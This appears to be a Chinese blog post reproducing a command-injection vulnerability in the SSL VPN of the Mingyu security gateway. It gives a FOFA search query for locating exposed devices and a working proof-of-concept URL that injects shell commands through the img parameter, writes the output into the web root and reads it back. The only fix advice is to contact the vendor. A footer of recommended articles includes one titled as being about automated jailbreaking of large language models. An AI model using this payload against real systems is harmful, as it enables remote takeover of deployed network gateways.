【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
fmingzh29 分钟前
NVIDIA高级辅助驾驶安全与技术读后感
人工智能·安全·自动驾驶
Zz_waiting.1 小时前
网络原理 - 10(HTTP/HTTPS - 1)
网络·http·https
Blossom.1181 小时前
量子网络:构建未来通信的超高速“高速公路”
网络·opencv·算法·安全·机器学习·密码学·量子计算
落——枫1 小时前
网络安全知识点3
安全·web安全
柴郡猫^O^2 小时前
OSCP - Proving Grounds - Wpwn
安全·网络安全·安全性测试
安全系统学习2 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php
洁✘2 小时前
web基础与http协议
网络·网络协议·http
想睡好3 小时前
以太网的mac帧格式
网络·macos
曼诺尔雷迪亚兹3 小时前
Wireshark快速入门--对启动的后端程序进行抓包
网络·测试工具·wireshark
FreeBuf_4 小时前
新型“电力寄生虫“网络钓鱼攻击瞄准能源企业与知名品牌
网络·php·能源